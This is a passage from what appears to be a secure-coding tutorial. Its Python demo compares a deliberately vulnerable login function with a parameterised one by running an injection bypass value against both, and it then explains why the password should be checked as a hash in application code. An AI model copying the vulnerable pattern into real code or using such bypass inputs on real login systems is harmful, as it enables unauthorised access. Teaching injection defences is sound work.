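    conn = _demo_db()
    valid = ("alice", "correct horse battery staple")
    return {
        "vulnerable_valid": login_vulnerable(conn, *valid),
        "vulnerable_bypass": login_vulnerable(conn, BYPASS, BYPASS),
        "parameterised_valid": login_parameterised(conn, *valid),
        "parameterised_bypass": login_parameterised(conn, BYPASS, BYPASS),
    }


if __name__ == "__main__":
    for case, result in compare_logins().items():
        print("%-22s %r" % (case, result))
```

Parameterised queries remove the injection, but the example deliberately keeps the plaintext password comparison out of scope: a real login should fetch the stored password hash by user name and verify it in application code rather than comparing passwords inside the SQL at all.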